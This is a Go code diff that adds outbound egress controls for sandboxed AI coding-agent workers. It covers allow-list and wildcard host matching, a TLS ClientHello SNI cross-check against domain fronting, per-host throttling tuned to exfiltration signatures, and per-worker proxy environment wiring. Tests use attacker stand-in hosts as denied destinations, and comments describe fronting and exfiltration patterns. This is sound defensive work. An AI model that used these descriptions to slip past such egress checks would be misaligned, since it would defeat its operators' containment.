+//     customer allow-list would otherwise exclude it).
+//  2. not enforcing (no customer list AND floor not enforced) → allow, but
+//     flagged monitor-only. This is the safe default: an install that
+//     configured nothing upgrades into watching, not blocking.
+//  3. customer list contains it → allow.
+//  4. otherwise → deny.
+//
+// "Enforcing" is the whole opt-in: the *presence* of a customer allow-list is
+// the mode (non-empty ⇒ restrict to floor ∪ list). enforceFloor is the
+// separate operator rung-3 lever that turns the floor into a hard ceiling even
+// without a customer list — off by default so the stock posture stays
+// monitor-only.
+type egressPolicy struct {
+	// allowlist is the customer's per-project set (nil/empty ⇒ monitor-only).
+	// Threaded from Project.langyEgressAllowlist via the credentials envelope.
+	allowlist []string
+	// floor is the operator-owned always-allowed set (github / gateway /
+	// control plane). Additive to the customer list, never a ceiling by itself.
+	floor []string
+	// enforceFloor makes the floor a hard ceiling when the customer sets no
+	// list (rung 3 "always-on floor" operator lever). Default false.
+	enforceFloor bool
+}
+
+// enforcing reports whether the policy blocks anything at all. False ⇒ every
+// destination is allowed (monitor-only). True ⇒ only floor ∪ allowlist pass.
+func (p egressPolicy) enforcing() bool {
+	return len(p.allowlist) > 0 || p.enforceFloor
+}
+
+// decide returns the verb for a destination FQDN and whether it is allowed.
+// The host is compared case-insensitively with the trailing root-dot stripped.
+func (p egressPolicy) decide(host string) egressDecision {
+	if hostMatchesAny(host, p.floor) {
+		return egressAllowedFloor
+	}
+	if !p.enforcing() {
+		return egressAllowedMonitor
+	}
+	if hostMatchesAny(host, p.allowlist) {
+		return egressAllowedListed
+	}
+	return egressDenied
+}
+
+// hostMatchesAny is true if host matches any pattern. A pattern is either an
+// exact FQDN ("registry.npmjs.org") or a single-leading-label wildcard
+// ("*.internal.acme.com" — matches "a.internal.acme.com" but NOT the bare
+// "internal.acme.com" nor a two-label "a.b.internal.acme.com"). The
+// single-label bound is deliberate (ADR-043 open question 1): it keeps the
+// matcher's attack surface narrow while covering the common "any host under my
+// internal domain" case.
+func hostMatchesAny(host string, patterns []string) bool {
+	h := normalizeHost(host)
+	if h == "" {
+		return false
+	}
+	for _, raw := range patterns {
+		p := normalizeHost(raw)
+		if p == "" {
+			continue
+		}
+		if suffix, ok := strings.CutPrefix(p, "*."); ok {
+			// host must be exactly one label followed by ".<suffix>".
+			rest, matched := strings.CutSuffix(h, "."+suffix)
+			if matched && rest != "" && !strings.Contains(rest, ".") {
+				return true
+			}
+			continue
+		}
+		if h == p {
+			return true
+		}
+	}
+	return false
+}
+
+// normalizeHost lowercases and strips a trailing root dot so "GitHub.com." and
+// "github.com" compare equal.
+func normalizeHost(host string) string {
+	return strings.TrimSuffix(strings.ToLower(strings.TrimSpace(host)), ".")
+}

--- a/services/langyagent/adapters/egress/policy_test.go
+++ b/services/langyagent/adapters/egress/policy_test.go
@@ -1,0 +1,84 @@
+package egress
+
+import "testing"
+
+func TestHostMatchesAny_ExactAndWildcard(t *testing.T) {
+	cases := []struct {
+		name     string
+		host     string
+		patterns []string
+		want     bool
+	}{
+		{"exact match", "registry.npmjs.org", []string{"registry.npmjs.org"}, true},
+		{"exact miss", "attacker.com", []string{"registry.npmjs.org"}, false},
+		{"case-insensitive", "GitHub.com", []string{"github.com"}, true},
+		{"trailing dot on host", "github.com.", []string{"github.com"}, true},
+		{"trailing dot on pattern", "github.com", []string{"github.com."}, true},
+		{"wildcard single label", "a.internal.acme.com", []string{"*.internal.acme.com"}, true},
+		{"wildcard rejects bare base", "internal.acme.com", []string{"*.internal.acme.com"}, false},
+		{"wildcard rejects two labels", "a.b.internal.acme.com", []string{"*.internal.acme.com"}, false},
+		{"wildcard rejects sibling domain", "a.evil.com", []string{"*.internal.acme.com"}, false},
+		{"empty host", "", []string{"github.com"}, false},
+		{"empty patterns", "github.com", nil, false},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if got := hostMatchesAny(tc.host, tc.patterns); got != tc.want {
+				t.Fatalf("hostMatchesAny(%q, %v) = %v, want %v", tc.host, tc.patterns, got, tc.want)
+			}
+		})
+	}
+}
+
+func TestEgressPolicy_DecisionPrecedence(t *testing.T) {
+	cases := []struct {
+		name   string
+		policy egressPolicy
+		host   string
+		want   egressDecision
+	}{
+		{
+			name:   "no list, floor off — monitor only",
+			policy: egressPolicy{},
+			host:   "anything.example",
+			want:   egressAllowedMonitor,
+		},
+		{
+			name:   "floor host always allowed",
+			policy: egressPolicy{allowlist: []string{"only-this.example"}, floor: []string{"github.com"}},
+			host:   "github.com",
+			want:   egressAllowedFloor,
+		},
+		{
+			name:   "listed host allowed",
+			policy: egressPolicy{allowlist: []string{"registry.npmjs.org"}},
+			host:   "registry.npmjs.org",
+			want:   egressAllowedListed,
+		},
+		{
+			name:   "unlisted host denied when enforcing",
+			policy: egressPolicy{allowlist: []string{"registry.npmjs.org"}},
+			host:   "attacker.example",
+			want:   egressDenied,
+		},
+		{
+			name:   "enforceFloor denies outside floor without a customer list",
+			policy: egressPolicy{floor: []string{"github.com"}, enforceFloor: true},
+			host:   "attacker.example",
+			want:   egressDenied,
+		},
+		{
+			name:   "floor NOT enforced leaves outside-floor monitor-only",
+			policy: egressPolicy{floor: []string{"github.com"}, enforceFloor: false},
+			host:   "outside.example",
+			want:   egressAllowedMonitor,
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if got := tc.policy.decide(tc.host); got != tc.want {
+				t.Fatalf("decide(%q) = %q, want %q", tc.host, got, tc.want)
+			}
+		})
+	}
+}

--- a/services/langyagent/adapters/egress/sni.go
+++ b/services/langyagent/adapters/egress/sni.go
@@ -1,0 +1,188 @@
+package egress
+
+import (
+	"errors"
+	"io"
+	"net"
+	"strings"
+	"time"
+)
+
+// The egress adapter reads the FQDN from the CONNECT authority as the primary,
+// enforceable destination (ADR-043 "Where FQDN enforcement lives"). It ALSO
+// peeks the TLS ClientHello SNI as a cross-check: a cooperative-but-hostile
+// client that sends `CONNECT allowed.com:443` and then negotiates TLS with SNI
+// `attacker.com` (domain-fronting a shared CDN) would otherwise slip past an
+// authority-only check. We parse the SNI without terminating TLS — the tunnel
+// stays opaque — and refuse a definite mismatch.
+
+// maxClientHelloRecord bounds how much we buffer while looking for the SNI. A
+// TLS record payload is at most 16384 bytes; the ClientHello fits comfortably.
+const maxClientHelloRecord = 18 << 10
+
+// peekClientHelloSNI reads the first TLS record from conn, returns the SNI host
+// found in it (lowercased, "" if none/not-a-ClientHello), and a net.Conn that
+// re-serves the consumed bytes so the caller can forward them upstream
+// unchanged. On any parse ambiguity it returns sni="" — the caller only ever
+// BLOCKS on a definite mismatch, never on an unparseable hello, so opaque and
+// non-TLS tunnels are unaffected.
+func peekClientHelloSNI(conn net.Conn, deadline time.Duration) (string, net.Conn, error) {
+	if deadline > 0 {
+		_ = conn.SetReadDeadline(time.Now().Add(deadline))
+		defer conn.SetReadDeadline(time.Time{})
+	}
+	record, err := readFirstTLSRecord(conn)
+	// Whatever we managed to read must be replayed, even on error, so the
+	// upstream sees a byte-identical handshake.
+	replayed := &prefixConn{Conn: conn, prefix: record}
+	if err != nil {
+		return "", replayed, err
+	}
+	return parseClientHelloSNI(record), replayed, nil
+}
+
+// readFirstTLSRecord reads one TLS record (5-byte header + payload). If the
+// leading byte is not a handshake content type (22) the stream isn't TLS; we
+// return what we read so it can be replayed, with no error. On a short read the
+// bytes actually consumed are returned so they can still be replayed upstream.
+func readFirstTLSRecord(r io.Reader) ([]byte, error) {
+	header := make([]byte, 5)
+	n, err := io.ReadFull(r, header)
+	if err != nil {
+		return header[:n], err
+	}
+	// header[0] == 22 (handshake). Anything else: not a TLS ClientHello.
+	if header[0] != 22 {
+		return header, nil
+	}
+	length := int(header[3])<<8 | int(header[4])
+	if length <= 0 || length > maxClientHelloRecord {
+		return header, errors.New("tls record length out of range")
+	}
+	payload := make([]byte, length)
+	pn, err := io.ReadFull(r, payload)
+	if err != nil {
+		return append(header, payload[:pn]...), err
+	}
+	return append(header, payload...), nil
+}
+
+// parseClientHelloSNI extracts the server_name from a full TLS record
+// (header+payload). Returns "" on any malformed or absent field — never panics
+// on a truncated buffer.
+func parseClientHelloSNI(record []byte) string {
+	if len(record) < 5 || record[0] != 22 {
+		return ""
+	}
+	b := record[5:] // handshake payload
+	// Handshake: type(1)=ClientHello(1), length(3), body.
+	if len(b) < 4 || b[0] != 1 {
+		return ""
+	}
+	b = b[4:]
+	// legacy_version(2) + random(32).
+	if len(b) < 34 {
+		return ""
+	}
+	b = b[34:]
+	// session_id: len(1) + bytes.
+	sid, ok := readVec8(b)
+	if !ok {
+		return ""
+	}
+	b = b[1+len(sid):]
+	// cipher_suites: len(2) + bytes.
+	cs, ok := readVec16(b)
+	if !ok {
+		return ""
+	}
+	b = b[2+len(cs):]
+	// compression_methods: len(1) + bytes.
+	cm, ok := readVec8(b)
+	if !ok {
+		return ""
+	}
+	b = b[1+len(cm):]
+	// extensions: len(2) + bytes.
+	exts, ok := readVec16(b)
+	if !ok {
+		return ""
+	}
+	return sniFromExtensions(exts)
+}
+
+// sniFromExtensions walks the extensions block looking for server_name (type
+// 0) and returns the first host_name (type 0) entry, lowercased.
+func sniFromExtensions(exts []byte) string {
+	for len(exts) >= 4 {
+		extType := int(exts[0])<<8 | int(exts[1])
+		extLen := int(exts[2])<<8 | int(exts[3])
+		exts = exts[4:]
+		if len(exts) < extLen {
+			return ""
+		}
+		body := exts[:extLen]
+		exts = exts[extLen:]
+		if extType != 0 { // server_name
+			continue
+		}
+		// ServerNameList: list_len(2) then entries of type(1)+len(2)+name.
+		if len(body) < 2 {
+			return ""
+		}
+		list := body[2:]
+		for len(list) >= 3 {
+			nameType := list[0]
+			nameLen := int(list[1])<<8 | int(list[2])
+			list = list[3:]
+			if len(list) < nameLen {
+				return ""
+			}
+			name := list[:nameLen]
+			list = list[nameLen:]
+			if nameType == 0 { // host_name
+				return strings.ToLower(strings.TrimSuffix(string(name), "."))
+			}
+		}
+		return ""
+	}
+	return ""
+}
+
+func readVec8(b []byte) ([]byte, bool) {
+	if len(b) < 1 {
+		return nil, false
+	}
+	n := int(b[0])
+	if len(b) < 1+n {
+		return nil, false
+	}
+	return b[1 : 1+n], true
+}
+
+func readVec16(b []byte) ([]byte, bool) {
+	if len(b) < 2 {
+		return nil, false
+	}
+	n := int(b[0])<<8 | int(b[1])
+	if len(b) < 2+n {
+		return nil, false
+	}
+	return b[2 : 2+n], true
+}
+
+// prefixConn re-serves a buffered prefix (the peeked ClientHello record) ahead
+// of the live connection, so forwarding the handshake upstream is byte-exact.
+type prefixConn struct {
+	net.Conn
+	prefix []byte
+}
+
+func (c *prefixConn) Read(p []byte) (int, error) {
+	if len(c.prefix) > 0 {
+		n := copy(p, c.prefix)
+		c.prefix = c.prefix[n:]
+		return n, nil
+	}
+	return c.Conn.Read(p)
+}

--- a/services/langyagent/adapters/egress/throttle.go
+++ b/services/langyagent/adapters/egress/throttle.go
@@ -1,0 +1,162 @@
+package egress
+
+import (
+	"context"
+	"io"
+	"sync"
+	"time"
+
+	"golang.org/x/time/rate"
+)
+
+// throttleConfig tunes the per-destination soft throttle (ADR-043 rung 1b).
+// The throttle is deliberately soft: it slows and flags a suspicious flow
+// rather than hard-denying it, so a legitimate large clone degrades instead of
+// falling off a false-positive cliff. Thresholds are a step-3 tuning task
+// (ADR open question 3) — these defaults are conservative starting points to
+// be re-derived from the observed byte/connection distributions.
+type throttleConfig struct {
+	// connWindow is the sliding window over which new connections to one host
+	// are counted.
+	connWindow time.Duration
+	// maxConnsPerWindow is the burst budget of new connections to a single host
+	// within connWindow before tar-pitting begins.
+	maxConnsPerWindow int
+	// tarpitPerExcessConn is the delay added per connection over budget,
+	// capped at maxTarpit. A burst is slowed, not blocked.
+	tarpitPerExcessConn time.Duration
+	maxTarpit           time.Duration
+	// byteBurst is how many bytes may flow to one host at full speed before the
+	// sustained rate cap engages (the token bucket's burst size).
+	byteBurst int64
+	// bytesPerSec is the sustained per-host throughput ceiling once byteBurst
+	// is exhausted.
+	bytesPerSec float64
+}
+
+// defaultThrottleConfig is a placeholder profile. Real numbers come from
+// monitoring (ADR-043 open question 3), not from a design guess.
+func defaultThrottleConfig() throttleConfig {
+	return throttleConfig{
+		connWindow:          10 * time.Second,
+		maxConnsPerWindow:   20,
+		tarpitPerExcessConn: 250 * time.Millisecond,
+		maxTarpit:           5 * time.Second,
+		byteBurst:           16 << 20, // 16 MiB flows free, then the cap engages
+		bytesPerSec:         4 << 20,  // 4 MiB/s sustained per destination
+	}
+}
+
+// egressThrottle holds per-destination-host flow state for one worker. It is
+// owned by a single egressAdapter (already per-worker), so "per destination,
+// per worker" is exactly this map keyed by host.
+type egressThrottle struct {
+	cfg throttleConfig
+
+	mu        sync.Mutex
+	connTimes map[string][]time.Time
+	limiters  map[string]*rate.Limiter
+}
+
+func newEgressThrottle(cfg throttleConfig) *egressThrottle {
+	return &egressThrottle{
+		cfg:       cfg,
+		connTimes: make(map[string][]time.Time),
+		limiters:  make(map[string]*rate.Limiter),
+	}
+}
+
+// admitConnection records a new connection to host and returns the tar-pit
+// delay to impose before establishing it (0 when under budget) and whether the
+// connection tripped the burst throttle. A burst of new connections to a rare
+// host — the exfiltration signature — is slowed here, per host, so other
+// destinations for the same worker are untouched.
+func (t *egressThrottle) admitConnection(host string) (time.Duration, bool) {
+	if t == nil {
+		return 0, false
+	}
+	now := time.Now()
+	cutoff := now.Add(-t.cfg.connWindow)
+
+	t.mu.Lock()
+	defer t.mu.Unlock()
+
+	times := t.connTimes[host]
+	kept := times[:0]
+	for _, ts := range times {
+		if ts.After(cutoff) {
+			kept = append(kept, ts)
+		}
+	}
+	kept = append(kept, now)
+	t.connTimes[host] = kept
+
+	excess := len(kept) - t.cfg.maxConnsPerWindow
+	if excess <= 0 {
+		return 0, false
+	}
+	delay := time.Duration(excess) * t.cfg.tarpitPerExcessConn
+	if delay > t.cfg.maxTarpit {
+		delay = t.cfg.maxTarpit
+	}
+	return delay, true
+}
+
+// limiterFor returns the per-host byte-rate limiter, lazily created. Each host
+// gets its own bucket so throttling one destination never slows another.
+func (t *egressThrottle) limiterFor(host string) *rate.Limiter {
+	t.mu.Lock()
+	defer t.mu.Unlock()
+	lim, ok := t.limiters[host]
+	if !ok {
+		lim = rate.NewLimiter(rate.Limit(t.cfg.bytesPerSec), int(t.cfg.byteBurst))
+		t.limiters[host] = lim
+	}
+	return lim
+}
+
+// throttledCopy streams src→dst, spending byte tokens from the per-host
+// limiter. It returns the number of bytes copied and whether the copy was ever
+// slowed by the limiter (i.e. the flow was throttled — the byte-volume
+// exfiltration signature). Errors terminate the copy the same way io.Copy
+// would; the caller treats a closed tunnel as normal completion.
+func throttledCopy(ctx context.Context, dst io.Writer, src io.Reader, lim *rate.Limiter) (int64, bool, error) {
+	// Chunk to the limiter's burst so WaitN never asks for more than the
+	// bucket can ever hold (which would error).
+	chunk := lim.Burst()
+	if chunk <= 0 || chunk > 64<<10 {
+		chunk = 64 << 10
+	}
+	buf := make([]byte, chunk)
+	var total int64
+	throttled := false
+	for {
+		n, rerr := src.Read(buf)
+		if n > 0 {
+			// Reserve first so we can observe whether tokens were unavailable
+			// (a real slow-down) versus freely granted from the burst.
+			r := lim.ReserveN(time.Now(), n)
+			if d := r.Delay(); d > 0 {
+				throttled = true
+				timer := time.NewTimer(d)
+				select {
+				case <-timer.C:
+				case <-ctx.Done():
+					timer.Stop()
+					r.Cancel()
+					return total, throttled, ctx.Err()
+				}
+			}
+			if _, werr := dst.Write(buf[:n]); werr != nil {
+				return total, throttled, werr
+			}
+			total += int64(n)
+		}
+		if rerr != nil {
+			if rerr == io.EOF {
+				return total, throttled, nil
+			}
+			return total, throttled, rerr
+		}
+	}
+}

--- a/services/langyagent/adapters/workerpool/pool.go
+++ b/services/langyagent/adapters/workerpool/pool.go
@@ -471,10 +471,16 @@ func (p *Pool) spawnInner(ctx context.Context, conversationID string, creds doma
 		}
 	}()
 
-	// Egress seam (ADR-047): a real guard (PR4) may set up per-worker egress
-	// monitoring here and fail the spawn closed. The default pass-through does
-	// nothing.
-	if err := p.egress.PrepareWorker(ctx, egress.WorkerContext{ConversationID: conversationID, UID: uid}); err != nil {
+	// Egress seam (ADR-043 / ADR-047): the enforcing guard stands up THIS
+	// worker's outbound forward proxy here and returns its loopback port (which
+	// buildWorkerEnv points HTTPS_PROXY at); it can fail the spawn closed. The
+	// observe-only / pass-through guards run no proxy (ProxyPort 0).
+	we, err := p.egress.PrepareWorker(ctx, egress.WorkerContext{
+		ConversationID:  conversationID,
+		UID:             uid,
+		EgressAllowlist: creds.EgressAllowlist,
+	})
+	if err != nil {
 		// The guard's reason is an internal diagnostic — logged, not surfaced.
 		// The rejection is deliberately handled, so the caller gets a herr with
 		// an actionable message.
@@ -483,6 +489,10 @@ func (p *Pool) spawnInner(ctx context.Context, conversationID string, creds doma
 	}
 	defer func() {
 		if !success {
+			// we.Close tears down THIS worker's forward proxy; ReleaseWorker fires
+			// the guard's observe-only release hook. Both nil-safe / idempotent and
+			// only run on a failed spawn — on success the live Worker owns `we`.
+			we.Close()
 			p.egress.ReleaseWorker(ctx, conversationID)
 		}
 	}()
@@ -565,7 +575,7 @@ func (p *Pool) spawnInner(ctx context.Context, conversationID string, creds doma
 	// alive across turns and only dies on idle/shutdown. Binding to baseCtx
 	// (rather than context.Background, as the flat manager did) means a pool
 	// Shutdown / deadline propagates to the subprocess.
-	cmd, err := spawnOpenCode(p.baseCtx, p.openCodeBinaryPath, conversationID, workerHome, uid, internalPort, creds, openCodePassword, p.disableUIDIsolation)
+	cmd, err := spawnOpenCode(p.baseCtx, p.openCodeBinaryPath, conversationID, workerHome, uid, internalPort, creds, openCodePassword, we.ProxyPort, p.disableUIDIsolation)
 	if err != nil {
 		return nil, err
 	}
@@ -624,6 +634,7 @@ func (p *Pool) spawnInner(ctx context.Context, conversationID string, creds doma
 		bearerToken:       bearerToken,
 		baseURL:           "http://127.0.0.1:" + strconv.Itoa(externalPort),
 		authProxy:         proxy,
+		egress:            we,
 		openCodeSessionID: sessionID,
 		cmd:               cmd,
 		uid:               uid,
@@ -652,6 +663,7 @@ func (p *Pool) onWorkerExit(conversationID string, cmd *exec.Cmd, uid uint32) {
 	var proxyToShutdown *authProxy
 	shouldWipe := false
 	deletedOwnEntry := false
+	var egressToClose egress.WorkerEgress
 
 	// The decision runs under the lock (defer-unlocked so a panic can't leave it
 	// held); the slow RemoveAll + egress I/O run AFTER the unlock.
@@ -662,6 +674,7 @@ func (p *Pool) onWorkerExit(conversationID string, cmd *exec.Cmd, uid uint32) {
 		if w, ok := p.workers[conversationID]; ok {
 			if w.cmd == cmd {
 				proxyToShutdown = w.authProxy
+				egressToClose = w.egress
 				delete(p.workers, conversationID)
 				shouldWipe = true
 				deletedOwnEntry = true
@@ -711,6 +724,10 @@ func (p *Pool) onWorkerExit(conversationID string, cmd *exec.Cmd, uid uint32) {
 	// Egress teardown runs OUTSIDE the pool lock: a real PR4 guard may perform
 	// network/monitoring I/O here, which must never stall the pool. It is not
 	// part of the home-dir race, so ordering after the unlock is correct.
+	// Close is the per-worker forward-proxy teardown (identity-guarded above so a
+	// replacement's proxy is never closed); ReleaseWorker is the guard's own
+	// observe-only hook. Both are idempotent / nil-safe.
+	egressToClose.Close()
 	if shouldWipe {
 		p.egress.ReleaseWorker(p.baseCtx, conversationID)
 	}
@@ -761,6 +778,11 @@ func (p *Pool) kill(conversationID, reason string) {
 	if w.authProxy != nil {
 		clog.Go(p.baseCtx, "authproxy-shutdown", w.authProxy.shutdown)
 	}
+	// Same for the per-worker egress forward proxy's loopback port. Closed HERE
+	// (synchronously with the kill, before the exit watcher's onWorkerExit runs)
+	// so a kill-then-respawn on the same conversation frees the port promptly and
+	// never leaves the old worker's proxy bound. Idempotent + nil-safe.
+	go w.egress.Close()
 }
 
 // reapIdle scans the registry and kills workers idle longer than WorkerIdle.

--- a/services/langyagent/adapters/workerpool/worker.go
+++ b/services/langyagent/adapters/workerpool/worker.go
@@ -6,6 +6,7 @@ import (
 	"errors"
 	"fmt"
 	"io"
+	"net/url"
 	"os"
 	"os/exec"
 	"path/filepath"
@@ -19,6 +20,7 @@ import (
 	"go.uber.org/zap"
 
 	"github.com/langwatch/langwatch/pkg/clog"
+	"github.com/langwatch/langwatch/services/langyagent/adapters/egress"
 	"github.com/langwatch/langwatch/services/langyagent/app"
 	"github.com/langwatch/langwatch/services/langyagent/domain"
 )
@@ -44,7 +46,14 @@ type Worker struct {
 	baseURL string
 	// authProxy fronts opencode with bearer-token auth. Shutdown on worker exit
 	// so the externally-advertised port frees up.
-	authProxy         *authProxy
+	authProxy *authProxy
+	// egress is the per-worker OUTBOUND egress handle (ADR-043) returned by the
+	// egress guard's PrepareWorker: it carries the loopback forward-proxy port
+	// the worker's HTTPS_PROXY points at (0 when the guard runs no proxy) and a
+	// Close that tears the proxy down. Closed on every teardown path (kill /
+	// exit / spawn failure), exactly like authProxy, so it never outlives the
+	// worker or leaks across a recycle.
+	egress            egress.WorkerEgress
 	openCodeSessionID string
 	cmd               *exec.Cmd
 	uid               uint32
@@ -358,7 +367,17 @@ func setupWorkerHome(workerHome, workspaceRoot string, creds domain.Credentials,
 // the filtered inherited env plus per-worker credentials and the per-worker
 // OPENCODE_SERVER_PASSWORD. Pure and side-effect free — factored out of
 // spawnOpenCode so it's unit-testable without spawning a real subprocess.
-func buildWorkerEnv(conversationID, workerHome string, creds domain.Credentials, openCodePassword string) []string {
+//
+// egressPort is the loopback port of THIS worker's egress adapter (ADR-043),
+// 0 when the guard runs no proxy. When set, it is injected as HTTPS_PROXY/
+// HTTP_PROXY so the worker's tools (`gh`, `git`, `npm`, `curl`, `pip`) egress
+// THROUGH the adapter, which enforces the require-TLS / throttle / allow-list /
+// FQDN-floor rungs. The in-cluster control-plane + gateway hosts and loopback
+// are put in NO_PROXY so the MCP server's LangWatch-API calls and opencode's
+// LLM traffic go direct (they have their own explicit NetworkPolicy egress
+// rules; routing them through the per-worker proxy would add a hop and expose
+// LLM streaming to the throttle).
+func buildWorkerEnv(conversationID, workerHome string, creds domain.Credentials, openCodePassword string, egressPort int) []string {
 	env := filterSensitiveEnv()
 	env = append(env,
 		"HOME="+workerHome,
@@ -390,7 +409,60 @@ func buildWorkerEnv(conversationID, workerHome string, creds domain.Credentials,
 			"GITHUB_LOGIN="+creds.GithubLogin,
 		)
 	}
+	if egressPort > 0 {
+		proxyURL := fmt.Sprintf("http://127.0.0.1:%d", egressPort)
+		noProxy := noProxyHosts(creds)
+		env = append(env,
+			// Lower- and upper-case both: `gh`/`git`/`curl` read the lower-case
+			// forms, some Go/Node tooling the upper-case ones.
+			"HTTPS_PROXY="+proxyURL,
+			"https_proxy="+proxyURL,
+			"HTTP_PROXY="+proxyURL,
+			"http_proxy="+proxyURL,
+			"NO_PROXY="+noProxy,
+			"no_proxy="+noProxy,
+		)
+	}
 	return env
+}
+
+// noProxyHosts is the NO_PROXY list for a worker: loopback plus the in-cluster
+// control-plane and gateway hosts, which egress via their own explicit
+// NetworkPolicy rules and must NOT be funnelled through the per-worker egress
+// adapter (ADR-043: "loopback and the in-cluster control-plane/gateway paths
+// are unaffected").
+func noProxyHosts(creds domain.Credentials) string {
+	hosts := []string{"127.0.0.1", "localhost", "::1"}
+	seen := map[string]struct{}{"127.0.0.1": {}, "localhost": {}, "::1": {}}
+	for _, raw := range []string{creds.LangwatchEndpoint, creds.GatewayBaseURL} {
+		h := hostFromURL(raw)
+		if h == "" {
+			continue
+		}
+		if _, dup := seen[h]; dup {
+			continue
+		}
+		seen[h] = struct{}{}
+		hosts = append(hosts, h)
+	}
+	return strings.Join(hosts, ",")
+}
+
+// hostFromURL extracts the bare hostname from a URL, tolerating a value with no
+// scheme. Returns "" when nothing host-like can be parsed.
+func hostFromURL(raw string) string {
+	raw = strings.TrimSpace(raw)
+	if raw == "" {
+		return ""
+	}
+	if !strings.Contains(raw, "://") {
+		raw = "//" + raw
+	}
+	u, err := url.Parse(raw)
+	if err != nil {
+		return ""
+	}
+	return u.Hostname()
 }
 
 // workerSysProcAttr builds the SysProcAttr for the opencode subprocess. Normally
@@ -442,12 +514,13 @@ func spawnOpenCode(
 	port int,
 	creds domain.Credentials,
 	openCodePassword string,
+	egressPort int,
 	disableIsolation bool,
 ) (*exec.Cmd, error) {
 	cmd := exec.CommandContext(ctx, openCodeBinaryPath,
 		"serve", "--port", strconv.Itoa(port), "--hostname", "127.0.0.1",
 	)
-	cmd.Env = buildWorkerEnv(conversationID, workerHome, creds, openCodePassword)
+	cmd.Env = buildWorkerEnv(conversationID, workerHome, creds, openCodePassword, egressPort)
 	cmd.Dir = workerHome
 	// Discard opencode's stdout/stderr. opencode emits LLM completions, tool
 	// outputs (env dumps, file contents), and the raw user prompt — all of which

--- a/services/langyagent/adapters/workerpool/worker_test.go
+++ b/services/langyagent/adapters/workerpool/worker_test.go
@@ -127,8 +127,8 @@ func TestBuildWorkerEnv_InjectsUniqueOpenCodePassword(t *testing.T) {
 		t.Fatalf("generateBearerToken: %v", err)
 	}
 
-	envA := buildWorkerEnv("conv-a", "/workspace/sessions/conv-a", creds, pwA)
-	envB := buildWorkerEnv("conv-b", "/workspace/sessions/conv-b", creds, pwB)
+	envA := buildWorkerEnv("conv-a", "/workspace/sessions/conv-a", creds, pwA, 19001)
+	envB := buildWorkerEnv("conv-b", "/workspace/sessions/conv-b", creds, pwB, 19002)
 
 	if got := valueOfEnv(envA, "OPENCODE_SERVER_PASSWORD"); got != pwA {
 		t.Fatalf("worker A env OPENCODE_SERVER_PASSWORD = %q, want %q", got, pwA)
@@ -151,7 +151,7 @@ func TestBuildWorkerEnv_InjectsCredentialsAndConditionalGithub(t *testing.T) {
 		GatewayBaseURL:    "https://gateway.internal/v1",
 		LangwatchEndpoint: "https://app.langwatch.ai",
 	}
-	env := buildWorkerEnv("conv-x", "/workspace/sessions/conv-x", creds, "pw")
+	env := buildWorkerEnv("conv-x", "/workspace/sessions/conv-x", creds, "pw", 0)
 
 	wants := map[string]string{
 		"OPENAI_BASE_URL":        "https://gateway.internal/v1",
@@ -172,12 +172,49 @@ func TestBuildWorkerEnv_InjectsCredentialsAndConditionalGithub(t *testing.T) {
 
 	creds.GithubToken = "ghp_real"
 	creds.GithubLogin = "alice"
-	withGH := buildWorkerEnv("conv-x", "/workspace/sessions/conv-x", creds, "pw")
+	withGH := buildWorkerEnv("conv-x", "/workspace/sessions/conv-x", creds, "pw", 0)
 	if got := valueOfEnv(withGH, "GH_TOKEN"); got != "ghp_real" {
 		t.Errorf("GH_TOKEN = %q, want ghp_real", got)
 	}
 	if got := valueOfEnv(withGH, "GITHUB_LOGIN"); got != "alice" {
 		t.Errorf("GITHUB_LOGIN = %q, want alice", got)
+	}
+}
+
+// buildWorkerEnv must point the worker's HTTPS_PROXY at the per-worker egress
+// adapter (ADR-043) when an egress port is set, and must NO_PROXY the loopback +
+// in-cluster control-plane / gateway hosts so their traffic goes direct rather
+// than through the throttled per-worker proxy. With no egress port, no proxy env
+// is injected (the worker egresses direct, as before).
+func TestBuildWorkerEnv_InjectsEgressProxy(t *testing.T) {
+	creds := domain.Credentials{
+		LangwatchAPIKey:   "lw-key",
+		LLMVirtualKey:     "vk",
+		GatewayBaseURL:    "https://gateway.internal/v1",
+		LangwatchEndpoint: "https://app.langwatch.ai",
+	}
+
+	env := buildWorkerEnv("conv-x", "/workspace/sessions/conv-x", creds, "pw", 19555)
+	wantProxy := "http://127.0.0.1:19555"
+	for _, key := range []string{"HTTPS_PROXY", "https_proxy", "HTTP_PROXY", "http_proxy"} {
+		if got := valueOfEnv(env, key); got != wantProxy {
+			t.Errorf("env[%s] = %q, want %q", key, got, wantProxy)
+		}
+	}
+	noProxy := valueOfEnv(env, "NO_PROXY")
+	for _, host := range []string{"127.0.0.1", "localhost", "app.langwatch.ai", "gateway.internal"} {
+		if !strings.Contains(noProxy, host) {
+			t.Errorf("NO_PROXY %q missing in-cluster/loopback host %q", noProxy, host)
+		}
+	}
+	if valueOfEnv(env, "no_proxy") != noProxy {
+		t.Errorf("no_proxy must mirror NO_PROXY")
+	}
+
+	// No egress port ⇒ no proxy env at all.
+	direct := buildWorkerEnv("conv-x", "/workspace/sessions/conv-x", creds, "pw", 0)
+	if got := valueOfEnv(direct, "HTTPS_PROXY"); got != "" {
+		t.Errorf("HTTPS_PROXY must be absent when no egress port is set, got %q", got)
 	}
 }
 

--- a/services/langyagent/cmd/manager.go
+++ b/services/langyagent/cmd/manager.go
@@ -3,40 +3,38 @@ package cmd
 import (
 	"strings"
 
+	"go.uber.org/zap"
+
 	langyagent "github.com/langwatch/langwatch/services/langyagent"
 	"github.com/langwatch/langwatch/services/langyagent/adapters/egress"
-	"github.com/langwatch/langwatch/services/langyagent/telemetry"
 )
 
-// Manager owns the composed egress adapter (ADR-044 part 5). It holds the
-// resolved scorer bounds (egressAdapterConfig) and the guard the pool consults,
-// so PR4's egress ENFORCEMENT can swap in behind this seam — read/extend the
-// config and replace the guard — without re-plumbing the composition root.
+// Manager owns the composed egress guard (ADR-043 enforcement). It holds the
+// per-worker egress guard the pool consults, built from the operator egress
+// posture in Config. Keeping it behind this seam lets the composition root wire
+// the pool without knowing which guard implementation is in force.
 type Manager struct {
-	egressAdapterConfig egress.Config
-	egressGuard         egress.Guard
+	egressGuard egress.Guard
 }
 
 // EgressGuard is the per-worker egress seam the worker pool consults.
 func (m *Manager) EgressGuard() egress.Guard { return m.egressGuard }
 
-// EgressConfig exposes the resolved scorer bounds (the allowlist + thresholds).
-// PR4 reads/extends these to tune enforcement against real flagged traffic.
-func (m *Manager) EgressConfig() egress.Config { return m.egressAdapterConfig }
-
